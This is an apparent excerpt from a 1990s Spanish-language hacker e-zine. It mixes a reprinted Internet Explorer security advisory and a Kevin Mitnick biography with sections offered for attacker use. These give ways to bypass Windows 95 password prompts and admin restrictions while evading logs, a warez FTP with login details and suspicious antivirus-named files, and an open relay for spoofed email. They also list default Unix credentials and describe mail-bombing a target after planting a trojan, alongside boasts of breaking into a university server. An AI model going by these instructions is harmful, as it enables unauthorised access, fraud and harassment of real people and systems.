de la empresa o bien en :

ftp://ftp.bol.com.br/pub/netutil/microsoft/update.exe

Este mensaje desperto la alarma

Dirk Balfanz y Ed Felten, del Departamento de Ciencia de
Computacion de la Universidad de Princeton
URL: http://www.cs.princeton.edu/sip/

Hemos descubierto un defecto de seguridad en la version actual
(3.0) del navegador Microsoft Internet Explorer funcionando bajo
Windows 95. Un agresor podria utilizar el defecto para iniciar cualquier
comando del DOS en la maquina del usuario del MS Explorer que este
visitando la pagina de dicho agresor.

Por ejemplo, el agresor podria leer, modificar o borrar archivos
de la victima, o insertar un virus o una entrada escondida a la maquina
de la victima. Hemos verificado este descubrimiento creando una pagina
Web que borra un archivo en la maquina de cualquier usuario del MS
Explorer que visite esta pagina.

El nucleo del ataque consiste en una tecnica para enviar un
documento al navegador de la victima evitando los chequeos de seguridad
que normalmente se aplicarian al documento. Si el documento fuera, por
ejemplo, una carpeta de Microsoft Word, podria contener una macro que
ejecutara cualquier comando DOS.

Normalmente, antes de recibir un archivo peligroso como un
documento Word, el MS Explorer muestra un aviso advirtiendo que el
archivo podria contener un virus o algun otro contenido peligroso, y
pregunta al usuario si no quiere recibir el archivo o si quiere
recibirlo de todas maneras. Esto da al usuario la posibilidad de evitar
el riesgo de un documento infectado. Sin embargo, nuestra tecnica
permite a un agresor enviar un documento sin disparar la pantalla de
aviso. Microsoft ya ha sido advertido y estan trabajando en la solucion
del problema.

No daremos mas detalles sobre el defecto hasta que el remedio
sea completamente accesible.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

*ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿*
³---------------------------------------------³
³SOBRE LOS DEFECTOS DE SEGURIDAD EN WINDOWS 95³
³---------------------------------------------³
*ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ*

Galahad vuelve al ataque para comentar algunos de los -extrepitosos-
fallos de seguridad en Windows 95. La compa¤ia del B. Puertas no anda
muy fina ultimamente en lo que a programacion se refiere, y han dejado
un par de puertas abiertas que nosotros, como buenos hackers, podemos
(y vamos) a aprovechar. He aqui una lista:

* Sobre como pasar de las ventanas de los passwords.

- Bien . . . Windows es un sistema que intenta ser seguro contra cuelgues,
por lo que pulsando CTRL+AlT+SUPR nos invita a cerrar cualquier ventana
que no este funcionando correctamente. Una pregunta: ¨habeis probado a
hacerlo con las ventanas que os piden un password? :)

- Otra posibilidad del Windows 95 es cerrar rapidamente una ventana pulsando
sobre el boton "X" en la barra de titulo. Pues eso, ¨Que os inpide cerrar
una ventana de password?

* Acceder al DOS

Windows 95 realmente no es un sistema operativo. Trabaja sobre el 2, que
si lo es, pero que no proporciona ninguna seguridad: ej. tu simpatico
vecinito de cinco a¤os puede formatearte el disco duro y 2 no se lo impedira.
Sin embargo, en Windows el sistema comprueba siempre las restricciones
aplicadas a los usuarios por el administrador. ¨Que quiere decir esto? Que
si tienes acceso al DOS, el ordenador es tuyo.
Pero ahora se plantea un problema:
Muchos administradores de sistemas "prohiben" la entrada al DOS a sus
usuarios. ¨Como entrar entonces? Elije la forma que prefieras:

- A traves del menu ejecutar: Imposible! Ningun administrador es tan tonto.
De todas maneras, prueba. Pulsa sobre Inicio|Ejecutar, escribe "Command"
(sin comillas) y pulsa enter. Si consigues el milagro, puedes ponerle una
vela a Santa Gema.

- A traves de la ayuda: Con un editor de textos hexadecimal como WordPad
(no el bloc de notas) abre el archivo "COMMAND.COM" vez a la opcion
"Guardar como..." normalmente en el menu "Archivo" y guardalo, en el
directorio donde este instalado Windows 95, con el nombre de
"WINHLP32.EXE". Ahora, cada vez que pulses la tecla F1, tendras un prompt
del DOS para ti solo :)

- Saltandote el inicio de Windows al encender el sistema.
Pulsando F8 cuando aparece el mensaje "Iniciando Windows 95" y
seleccionando despues "Solo simbolo de MS-2" accederas al 2. Un metodo no
muy bueno, pues muchos administradores desactivan el teclado en el inicio
del Windows.

- A traves de la pantalla "Ahora puede apagar el equipo"
Lo que sucede realmente al apagar el sistema es que Windows se descarga
de memoria y presenta el famoso dibujito en la pantalla. Pero he aqui lo
importante: Nos deja sobre MS-2. Prueba a escribir "CLS". La pantalla
se borrara y aparecera el prompt del 2, en un modo grafico un tanto
peculiar. Para ver el prompt en modo de texto, escribe "MODE 80".
­Podras utilizar el 2 sin problemas! ­Tu accion no se registrara en los
logs del administrador! Un chollo, compadre. :)

Hay otros metodos, pero estos son los mejores. Algunos Los corrige MS-PLUS!
Si es ese el caso, usa el segundo. Funciona siempre ;)

GALAHAD
Miembro de Legion Oscura.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
³ ³
³ La Historia del Chacal de la Red ³
³ ³
ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß

Como Hacker la carrera de Kevin Mitnick comenzo a los 16 a¤os, cuando
-obsesionado por las redes de computadoras- rompio la seguridad del sistema
administrativo de su colegio.

Escrito por: Gilberto Pagua

Mr. Mitnick.

Todo aquel que sea conceptualizado como un Internauta se caracteriza por
utilizar un telefono, un modem y una computadora para muchos fines
diferentes: Divertirnos, informarnos, estudiar, cocinar, planificar viajes
y otras actividades que amplian nuestro quehacer diario. Para Kevin Mitnick
el quehacer diario en sus ultimos diez a¤os fue el explorar y "explotar"
computadoras ajenas y sistemas telefonicos. ¨Su profesion? "Hacker" de
nacimiento.

Este "terrorista electronico", como lo cataloga el Departamento de Justicia
de los Estados Unidos, conocido en los medios como el "Condor", fue capaz de
crear numeros telefonicos imposibles de facturar (para la compa¤ia
telefonica el era James Bond, con un numero que terminaba en 007), pudo
apropiarse de 20.000 numeros de tarjetas de credito de habitantes de
California y burlarse del FBI por mas de dos a¤os con solo un telefono
celular alterado y un computador portatil.

Es la peor pesadilla de las empresas de telefonia. Es sospechoso de robar el
software de mas de media docena de fabricantes de telefonos celulares y
tenia el control de tres oficinas centrales de telefonos en Manhattan y de
todos los centros de conmutacion de California, dandole la habilidad de
escuchar cualquier conversacion telefonica o, si no eras una persona de su
agrado, modificar el telefono de tu casa de tal manera que, cada vez que
levantaras el auricular, una grabadora pedia que depositaras 25 centavos.

¨Como se forma un Hacker?

Como Hacker, la carrera de Mitnick tiene sus inicios en 1980 cuando apenas
contaba 16 a¤os y, obsesionado por las redes de computadoras, rompio la
seguridad del sistema administrativo de su colegio, pero no para alterar sus
notas, lo hizo "solo para mirar". Su bautizo como infractor de la ley fue en
1981. Junto a dos amigos entro fisicamente a las oficinas de COSMOS de
Pacific Bell. COSMOS (Computer System for Mainframe Operations) era una base
de datos utilizada por la mayor parte de las compa¤ias telefonicas
norteamericanas para controlar el registro de llamadas. Una vez dentro de
las oficinas obtuvieron la lista de claves de seguridad, la combinacion de
las puertas de acceso de varias sucursales y manuales del sistema COSMOS. La
informacion robada tenia un valor equivalente a los 200 mil dolares. Fueron
delatados por la novia de uno de los amigos y debido a su minoria de edad
una Corte Juvenil lo sentencio a tres meses de carcel y a un a¤o bajo
libertad condicional.

Luego de cumplido el periodo de tres meses el oficial custodio encargado de
su caso encontro que su telefono fue desconectado y que en la compa¤ia
telefonica no habia ningun registro de el.

Sus objetivos iban creciendo a cada paso y en 1982 entro ilegalmente, via
modem, a la computadora del North American Air Defense Command en Colorado.
Antes de entrar altero el programa encargado de rastrear la procedencia de
las llamadas y desvio el rastro de su llamada a otro lugar. El FBI, creyendo
que habia hallado a Mitnick, allano la casa de unos inmigrantes que estaban
viendo television.

Un a¤o mas tarde fue arrestado de nuevo cuando era estudiante de la
Universidad del Sur de California. En esta ocasion entro ilegalmente a
ARPAnet (la predecesora de Internet) y trato de accesar a la computadora del
Pentagono. Lo sentenciaron a seis meses de carcel en una prision juvenil en
California.

En 1987, luego de tratar de poner su vida en orden, cayo ante la tentacion y
fue acusado, en Santa Cruz California, de invadir el sistema de la compa¤ia
Microcorp Systems. Lo sentenciaron a tres a¤os de libertad condicional y
luego de la sentencia su expediente desaparecio de la computadora de la
policia local.

Luego busco trabajo en lo que mejor sabia hacer y solicito empleo en el
Security Pacific Bank como encargado de la seguridad de la red del banco. El
banco lo rechazo por sus antecedentes penales y Mitnick falsifico un balance
general del banco donde se mostraban perdidas por 400 millones de dolares y
trato de enviarlo por la red. Afortunadamente el administrador de la red
detuvo el balance antes de que viera la luz.

Ese mismo a¤o inicio el escandalo que lo lanzo a la fama. Durante meses
observo secretamente el correo electronico de los miembros del departamento
de seguridad de MCI Communications y Digital Equipment Corporation para
conocer como estaban protegidos las computadoras y el sistema telefonico de
ambas compa¤ias.

Luego de recoger suficiente informacion se apodero de 16 codigos de seguridad
de MCI y junto a un amigo, Lenny DiCicco, entraron a la red del laboratorio
de investigaciones de Digital Corporation, conocida como Easynet. Ambos
Hackers querian obtener una copia del prototipo del nuevo sistema operativo
de seguridad de Digital llamado VMS. El personal de seguridad de Digital se
dio cuenta inmediatamente del ataque y dieron aviso al FBI, y comenzaron a
rastrear a los hackers.

Mitnick fue un mal complice y, a pesar de que habian trabajado juntos, trato
de echarle toda la culpa a DiCicco haciendo llamadas anonimas al jefe de
este que trabajaba en una compa¤ia de software como tecnico de soporte.
Lleno de rabia y frustracion DiCicco le confeso todo a su jefe que los
denuncio a Digital y al FBI.

Mitnick fue arrestado en 1988 por invadir el sistema de Digital Equipment.
La empresa acuso a Mitnick y a DiCicco ante un juez federal de causarles
da¤os por 4 millones de dolares en el robo de su sistema operativo. Fue
declarado culpable de un cargo de fraude en computadoras y de uno por
posesion ilegal de codigos de acceso de larga distancia.

Adicional a la sentencia el fiscal obtuvo una orden de la corte que prohibia
a Mitnick el uso del telefono en la prision alegando que el prisionero podria
obtener acceso a las computadoras a traves de cualquier telefono. A peticion
de Mitnick el juez lo autorizo a llamar unicamente a su abogado, a su esposa,
a su madre y a su abuela y solo bajo supervision de un oficial de la prision.

Este caso produjo revuelo en los Estados Unidos, no solo por el hecho
delictivo sino por la tactica que utilizo la defensa. Su abogado convencio
al juez que Mitnick sufria de una adiccion por las computadoras equivalente
a la de un drogadicto, un alcoholico o un apostador. Gracias a esta maniobra
de la defensa Mitnick fue sentenciado a solo un a¤o de prision y al salir de
alli debia seguir un programa de seis meses para tratar su "adiccion a las
computadoras". Durante su tratamiento le fue prohibido tocar una computadora
o un modem y llego a perder mas de 45 kilos.

Para 1991 ya era el Hacker que habia ocupado la primera plana del New York
Times y uno de sus reporteros, John Markoff, decidio escribir un libro de
estilo Cyberpunk narrando las aventuras de Mitnick. Al parecer a Mitnick no
le gusto el libro ya que luego de salir a la venta, la cuenta en Internet
de Markoff fue invadida, cambiando su nivel de acceso, de manera de que
cualquier persona en el mundo conectada a Internet podia ver su correo
electronico.

En 1992, y luego de concluir su programa, Mitnick comenzo a trabajar en una
agencia de detectives. Pronto se descubrio un manejo ilegal en el uso de la
base de datos y fue objeto de una investigacion por parte del FBI quien
determino que habia violado los terminos de su libertad condicional.
Allanaron su casa pero habia desaparecido sin dejar rastro alguno. Ahora
Mitnick se habia convertido en un Hacker profugo.

El fiscal no estaba tan equivocado cuando pidio la restriccion del uso del
telefono. Tambien en 1992, el Departamento de Vehiculos de California
ofrecio una recompensa de 1 millon de dolares a quien arrestara a Mitnick
por haber tratado de obtener una licencia de conducir de manera fraudulenta,
utilizando un codigo de acceso y enviando sus datos via fax.

El Fin

Luego de convertirse en profugo de la justicia cambio de tactica y concluyo
que la mejor manera de no ser rastreado era utilizando telefonos celulares.
De esta manera podria cometer sus fechorias y no estar atado a ningun lugar
fijo. Para ello necesitaba obtener programas que le permitieran moverse con
la misma facilidad con que lo hacia en la red telefonica.

Luego de varios intentos infructuosos, en cuanto a calidad de informacion,
se encontro con la computadora de Tsutomu Shimomura la cual invadio en la
Navidad de 1994. Shimomura, fisico computista y experto en sistemas de
seguridad del San Diego Supercomputer Center, era ademas un muy buen Hacker,
pero era de los "chicos buenos", ya que cuando hallaba una falla de seguridad
en algun sistema lo reportaba a las autoridades, no a otros Hackers.

Shimomura noto que alguien habia invadido su computadora en su ausencia,
utilizando un metodo de intrusion muy sofisticado y que el nunca antes habia
visto. El intruso le habia robado su correo electronico, software para el
control de telefonos celulares y varias herramientas de seguridad en
Internet. Alli comenzo la cuenta regresiva para Mitnick. Shimomura se
propuso como orgullo personal atrapar al Hacker que habia invadido su
privacidad.

Hacia finales de enero de 1995, el software de Shimomura fue hallado en una
cuenta en The Well, un proveedor de Internet en California. Mitnick habia
creado una cuenta fantasma en ese proveedor y desde alli utilizaba las
herramientas de Shimomura para lanzar ataques hacia una docena de
corporaciones de computadoras, entre ellas Motorola, Apple y Qualcomm.

Shimomura se reunio con el gerente de The Well y con un tecnico de Sprint
(proveedor de servicios telefonicos celulares) y descubrieron que Mitnick
habia creado un numero celular fantasma para accesar el sistema. Luego de
dos semanas de rastreos determinaron que las llamadas provenian de Raleigh,
California.

Al llegar Shimomura a Raleigh recibio una llamada del experto en seguridad
de InterNex, otro proveedor de Internet en California. Mitnick habia
invadido otra vez el sistema de InterNex, habia creado una cuenta de nombre
Nancy, borrado una con el nombre Bob y habia cambiado varias claves de
seguridad incluyendo la del experto y la del gerente del sistema que posee
los privilegios mas altos. De igual manera Shimomura tenia informacion sobre
la invasion de Mitcnick a Netcom, una red de base de datos de noticias.

Shimomura se comunico con el FBI y estos enviaron a un grupo de rastreo por
radio. El equipo de rastreo poseia un simulador de celda, un equipo
normalmente utilizado para probar telefonos celulares pero modificado para
rastrear el telefono de Mitnick mientras este esta encendido y aunque no
este en uso. Con este aparato el celular se convertiria en un transmisor sin
que el usuario lo supiera.

A medianoche terminaron de colocar los equipos en una Van y comenzo la
busqueda de la se¤al, porque eso era lo que querian localizar; no buscaban a
un hombre porque todas las fotos que tenian eran viejas y no estaban seguros
de su aspecto actual, el objetivo de esa noche era determinar el lugar de
procedencia de la se¤al. Ya para la madrugada localizaron la se¤al en un
grupo de apartamentos pero no pudieron determinar en cual debido a
interferencias en la se¤al.

Mientras esto ocurria la gente de InterNex, The Well y Netcom estaban
preocupados por los movimientos que casi simultaneamente Mitnick hacia en
cada uno de estos sistemas. Cambiaba claves de acceso que el mismo habia
creado y que tenian menos de 12 horas de creadas, utilizando codigos
extra¤os e ironicos como no,panix, fukhood y fuckjkt. Estaba creando nuevas
cuentas con mayores niveles de seguridad como si sospechara que lo estaban
vigilando.

El FBI, Shimomura y el equipo de Sprint se habian reunido para planificar la
captura. Shimomura envio un mensaje codificado al buscapersonas del
encargado en Netcom para advertirle que el arresto se iba a realizar al dia
siguiente, 16 de Febrero.
Shimomura envio el mensaje varias veces por equivocacion y el encargado
interpreto que Mitnick ya habia sido arrestado adelantandose a realizar una
copia de respaldo de todo el material que Mitnick habia almacenado en Netcom
como evidencia y borrando las versiones almacenadas por Mitnick. Habia que
realizar el arresto de inmediato, antes de que Mitnick se diera cuenta de
que su informacion habia sido borrada.

Cuando faltaban minutos para dar la orden el simulador de celdas detecto una
nueva se¤al de transmision de datos via celular y simultanea a la de
Mitnick, muy cerca de esa zona. Algo extra¤o estaba haciendo Mitnick con las
lineas celulares, Shimomura trato de advertirle al agente del FBI pero ya
todo estaba en manos de ellos, Shimomura de ahora en adelante no era mas que
un espectador privilegiado. El FBI no pensaban hacer una entrada violenta
porque no creian que Mitnick estuviera armado, pero tenian que actuar muy
rapido porque sabian el da¤o que este hombre podia causar en un solo minuto
con una computadora. Se acercaron lentamente hasta la entrada del apartamento
de Mitnick y anunciaron su presencia, si no les abrian la puerta en cinco
segundos la echarian abajo. Mitnick abrio la puerta con toda calma y el FBI
procedio a arrestarlo y a decomisar todo el material pertinente discos,
computador, telefonos celulares, manuales, etc.

De regreso a su hotel Shimomura decide chequear la contestadora telefonica
de su residencia en San Diego. Se quedo en una pieza cuando escucho la voz
de Mitnick quien le habia dejado varios mensajes con acento oriental en tono
de burla. El ultimo de estos mensajes lo habia recibido ocho horas despues
de que Mitnick habia sido arrestado y antes de que la prensa se hubiera
enterado de todo el asunto. Como se realizo esa llamada aun es un misterio
al igual que el origen y objetivo de la segunda se¤al de Mitnick.

Este persistente hacker actualmente esta siendo juzgado y enfrenta dos
cargos federales, uso ilegal de equipos de acceso telefonico y fraude por
computadoras. Puede ser condenado por hasta 35 a¤os y a pagar una multa de
hasta medio millon de dolares. Mitnick tambien es sospechoso de robar el
software que las compa¤ias telefonicas piensan usar para todo tipo de
procesos, desde la facturacion hasta el seguimiento del origen de una llamada
pasando por la decodificacion de las se¤ales de los telefonos celulares para
preservar su privacidad.

El vuelo final

Todos los cargos bajo los cuales
ha sido acusado Kevin Mitnick podrian
suponerle mas de doscientos a¤os
de prision si es declarado culpable

"No culpable" alcanzo a declararse Kevin Mitnick ante el Gran Jurado de
California, que el pasado 30 de septiembre lo acuso de 25 cargos por los
cuales podria ser condenado a mas de doscientos a¤os de presidio.

"Esta acusacion revela el amplio da¤o que Mitnick causo mientras era un
fugitivo de la justicia. Los delitos por computadora permiten a
sofisticados criminales causar estragos alrededor del mundo usando solo
una computadora y un modem como sus armas. Queremos con esta acusacion
dar un paso adelante en los esfuerzos federales por perseguir y capturar
a los hackers" dijo la fiscal encargada del caso, Nora Manella. Los
cargos por los que fue acusado Mitnick y su ayudante Lewis Depayne, de
36 a¤os, incluyen el robo de software, fraude electronico, da¤o a las
computadoras de la Universidad del Sur de California, robo de archivos
electronicos e intercepcion de mensajes de correo electronico. Entre las
compa¤ias afectadas por las actividades del llamado "Condor" se cuentan
Motorola, Nokia, Fujitsu y Nec.

Se supone que los da¤os causados por Mitnick en los dos a¤os y medio
durante los cuales fue un fugitivo suman millones de dolares,
especialmente por el software robado y las inversiones que debieron
realizar las empresas para proteger sus sistemas. El asistente del
fiscal David Schindler dijo que Mitnick -quien actualmente tiene 33 a¤os-
seria probablemente sentenciado a "muchos a¤os" si es encontrado
culpable, negandose, sin embargo, a ser mas especifico, bajo el argumento
de que se trata de un area legal muy nueva. Todos los cargos bajo los
cuales ha sido acusado Mitnick podrian suponerle mas de doscientos a¤os
de prision si es declarado culpable de todos ellos.

Ya en abril de este a¤o el famoso hacker habia sido declarado culpable
por un jurado de Carolina del Norte por el uso del quince numeros de
telefonos celulares robados para llamar a bases de datos electronicas.
Igualmente se le condeno por haber violado el regimen de libertad
condicional al que estaba sometido luego de ser encontrado culpable de
penetrar ilegalmente en sistemas de informacion de corporaciones de
informatica.

Mitnick: hacker, cracker y phone phreaker

La definicion de un cracker es alguien que trata de violar el acceso a
un sistema adquiriendo passwords. La mayoria de los crackers son
adolescentes nada bondadosos y que buscan dar sus golpes destruyendo o
alterando la data de un sistema. Tienden a unirse en grupos muy peque¤os,
secretos y cerrados al contrario de los inmensos, abierto y
policulturales hackers.

Se espera que un verdadero hacker haga algo de crackin jugueton y
conozca muchas de las tecnicas basicas, pero cualquiera que pase de la
etapa de larva puede caer en la tentacion y, debido a su creciente deseo
de realizar algo por razones inmediatas, benignas y practicas, no vea
nada de malo en invadir cierta seguridad y privacidad para poder lograr
una meta.

Para el cracker el invadir un sistema no requiere de misteriosos estados
de iluminacion mental, pero si mucha persistencia y la testaruda
repeticion de trucos bien conocidos en los puntos debiles de un sistema,
tratan de descubrir informacion clasificada hurgando al azar y con ciega
persistencia.

Suele decirse que los crackers son solo hackers mediocres y que su nivel
de educacion e inteligencia sobre un sistema es menor.

Los phone phreaker son los mas famosos en los medios de comunicacion por
los desastres que han hecho a traves de los a¤os. En los a¤os 60 ya
existian los Phone Phreaks y la gran victima era AT&T. Uno de los mas
famosos Phone Phreaks de esa epoca era John Draper, alias Captain Crunch
(http://www.fc.net/phrack.html). El descubrio que modificando una caja
de cereal podia producir el silbido que simulaba un tono de 2600 Hz para
desbloquear el acceso a una troncal y poder hacer llamadas
internacionales gratis.

Hace algun tiempo el hacer phreaking fue una actividad semi-respetable
dentro de la comunidad hacker; habia un acuerdo de caballeros donde el
hacer phreaking era bien visto como juego intelectual y como una forma
de exploracion, pero el robo de servicios era tabu. La modernizacion de
las redes hizo necesario que los phreakers utilizaran tecnicas menos
eticas, como robar numeros de calling cards: los obtenian colocandose
cerca de algun telefono publico y memorizando el numero de tarjeta que
marcaba un usuario descuidado, una vez obtenido el numero y la clave la
informacion era esparcida de tal manera que en un caso se llegaron a
realizar 600 llamadas internacionales en dos minutos antes de que los
operadores de seguridad del sistema la cancelaran.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

²²° ²²²²²²° ²²²²²²° ²²²²²²° ²²° ²²° ²²²²²° ²²²²²° ²²° ²²°
²²° ²²° ²²° ²²° ²²° ²²° ²²° ²²° ²²° ²²° ²²°²²°
²²° ²²²²° ²²° ²²° ²²²²²²²° ²²²²²²²° ²²° ²°²²°
²²° ²²° ²²° ²²° ²²° ²²° ²²° ²²° ²²° ²²° ²²°²²°
²²²²²²²° ²²²²²²° ²²° ²²²²²²° ²²° ²²° ²²° ²²° ²²²²²° ²²° ²²°

"If eating animals is wrong, how come they are made of meat?"
-David Letterman

[ La seccion de LETZ HACK! ha sido donada a los miembros de RdK que
actualmente no se han interesado en participar en la revista de forma
permanente por sus deseos de seguir UnderGround y temor a represalias. ]

INTERCAMBIANDO ARCHIVOS ENTRE HACKERS
ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß

Si quieres conseguir WareZ o copiar archivos entre hackers puedes usar los
FTP'S que aceptan escritura en directorios como /incoming /tmp /temp Uno de
los FTP que en este momento se encuentra activo como WareZ Trade FTP oficial
es ftp.cincos.net

ftp.cincos.net
Login: anonymous
Password: guest

Este servidor nos deja escribir en el directorio /incoming

Asegurense de checar el WAREZ en esos directorios sobre todo las versiones
completas de los siguientes programas

McAffe 95 ---> /incoming/alf/MCCAFEE95.EXE
PcCillin 95 ---> /incoming/alf/pcc.zip

Como ustedes deben saber, cualquiera puede borrar esos archivos pero si a
alguien se le ocurre hacerlo nosotros mismos (RdK) buscaremos en los LOGS sus
direcciones IP y los haremos arrepentirse el resto de sus vidas asi que
evitense problemas y disfruten estos maravillosos programas que han sido
copiados a estos directorios por algun WareZ D00d que se tomo el tiempo de
hacerlo asi que respetemos su trabajo.

EMAIL FALSO SIN DIRECCIONES IP
ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß

Cuando explicaron en los numeros anteriores como mandar email falso
mencionaron la importancia de no abusar del email falso ya que las
direcciones IP quedaban grabadas en los mensajes y un usuario con experiencia
podria rastrearlos sin problemas. En este numero hacemos un UPDATE a ese
articulo mencionando el siguiente servidor de correo que nos permite enviar
email sin imprimir nuestra direccion IP en el mensaje.

televisa.com.mx

Asi es, nuestros queridos amigos de televisa (sic) nos permiten enviar correo
falso sin revelar nuestras direcciones IP. Para saber como hacerlo consulta
el articulo Trucos con E-mail que aparece en el primer numero de RareGaZz.
Tengan cuidado por que probablemente pronto televisa deje de ofrecer este
servicio y pueden meterse en problemas. Como siempre primero verifiquen.

DEFAULTS PARA UNIX
ßßßßßßßßßßßßßßßßßß
Login Login Login Login Login
~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~
GUEST uucp system trouble veal
guest ssck backup sysdiag geac
notes user remote startup vax
getty sys5 decnet sysmait vms
setup news ingres systest help
admin iris mailer umountssys link
games mait netcon postmaster mail
userp oper netmgr lp priv
field usrc oracle rje test
fault host mountssys msgs decmail
unix vlsi checkssys sccs digital
makesys operator powerdown asg library
sysadmin helpdesk netserver tty netpriv
sysmaint teledemo report bbx network
sysman listen reports dcl opervax
finger daemon uucpadm sas student
manager

Las cuentas anteriores no tienen password o es el mismo login

ÚÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄ¿ÚÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄ¿
³ Default ³ Password ³³ Default ³ Password ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄ´ÃÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄ´
³decnet ³ddennet ³³guest ³friend ³
³field ³service ³³guest ³welcome ³
³system ³manager ³³default ³user ³
³decnet ³nonpriv ³³field ³digital ³
³field ³test ³³netnonpriv ³nonpriv ³
³postmaster ³mail ³³sysmaint ³service ³
³sysmaint ³digital ³³system ³operator ³
³system ³manager ³³system ³syslib ³
³system ³uetp ³³systest_clig³systest ³
³userp ³user ³³ ³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÙÀÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÙ

Causando PaniKo en la red
ßßßßßßßßßßßßßßßßßßßßßßßßß

Cuando sepas que alguna persona que no es de tu agrado va a estar fuera de
la red por algun tiempo lo mejor que puedes hacer es subscribirlo a una
lista de correo de gran volumen. Existe una llamada CYPHERPUNKS y para
subscribir a alguien solo es necesario que envies un mensaje desde la
direccion que deseas subscribir a la direccion MAJORDOMO@TOAD.COM con el
comando en el cuerpo del mensaje: subscribe cypherpunks

Puedes mandarle un troya y cuando sepas que lo ha ejecutado subscribelo y
cuando regresa va encontrar cientos de mensajes >:-)

[ Whoa! estos chamacos del RdK me sorprenden, cuando yo inicie con ellos
eramos 4 o 5 y ahora tienen 22 miembros dedicados enteramente a causar kaos
en sistemas mexicanos. Por lo pronto yo -raretrip- sigo siendo miembro con
la diferencia que hago hacking por mi cuenta...como debe ser! ]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

-= Nuevas Tecnologias =-
Java, Activex, Javascripts, etc.

Ahora los navegadores soportan gran variedad de tecnologias que nos permiten
una interaccion mas intima entre nosotros y el sitio que visitamos pero a su
vez ponen en peligro la seguridad de los datos de nuestra computadora y la
privacidad de nuestro origen.

Secreto no es para nadie que usando un Applet Java se puede da¤ar un archivo
o el disco entero, asi como tambien con Activex.
Ahora con las nuevas tecnologias la modificacion de un archivo sin que el
usuario se de cuenta resulta facil de realizar y hasta divertido.

Existe un servicio en la red que nos permite revisar los controladores de
nuestro sistema internamente (en caso de ser windows95) y cambiar las
versiones viejas por nuevas todo esto simplemente visitando una pagina Web.
Esta es una aplicacion Benigna de las nuevas tecnologias pero imaginemonos
el reemplaso de un archivo con un troya o virus...¨Que nos protegeria?

El site del que hablo necesita un software que lo puedes conseguir en la
siguiente direccion: http://www.cybermedia.com

Escrito por ??????@orca.ens.cetys.mx para RareGaZz

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷
÷ CTRL + ALT +DEL ÷
÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷

"Y Dios dijo...­QUE SE HAGA LA LUZ! Y pidio a RareTrip
que moviera el switch. Y vio Dios que la luz era buena
y separo la luz de las tinieblas.Y llamo Dios a la luz
RareGaZz y a las tinieblas lo demas..."
-Libro del Genesis, capitulo escondido.

Bienvenidos a la primera aparicion de la seccion CTRL+ALT+DEL que busca
reunir las dudas que ustedes nos hacen llegar por email y ponerlas a
dispocision de todos para que entre todos sigamos adelante. John Lenon ya
lo dijo antes 'Get together right now...over me.'


* ballena.ens.cetys.mx *

Hola, les escribo para hacerles saber que hemos abierto otro site del cetys
campus ensenada y estamos esperando que algunos hackers prueben la seguridad
para tener un website seguro. gracias.

[ Aja! con que nos quieren agarrar con las manos en la masa. Pues nosotros
aqui en RareGaZz no estamos interesados, ya logramos entrar a su sistema
orca.ens.cetys.mx con facilidad y hasta platique usando su sistema de chat
con el operador del sistema mencionandole sus errores asi que se me
ocurre que tal vez esten esperando a algun hacker novato.
El administrador de orca es lecuanda@orca.ens.cetys.mx por si quieres
verificar que ya entre a su sistema y hasta platique con el. ]

¨RdK es una broma?

Para nada, somos un grupo de terroristas -si asi es- encargados de causar
KaoS en los sistemas mexicanos reclamando democracia, libertad politica y
sobre todo una mayor apertura a los grupos sociales como Rdk en los medios
de comunicacion para transmitir nuestras ideas.

¨Podran ser Detenidos?

­NO WAY JOSE! Quizas puedan con uno pero con todos nosotros Nunca. Dia a dia
se unen al equipo mas personas y esta es una bola de nieve que jamas podra
ser detenida. Eso si, algun dia yo me retirare de la edicion de la revista
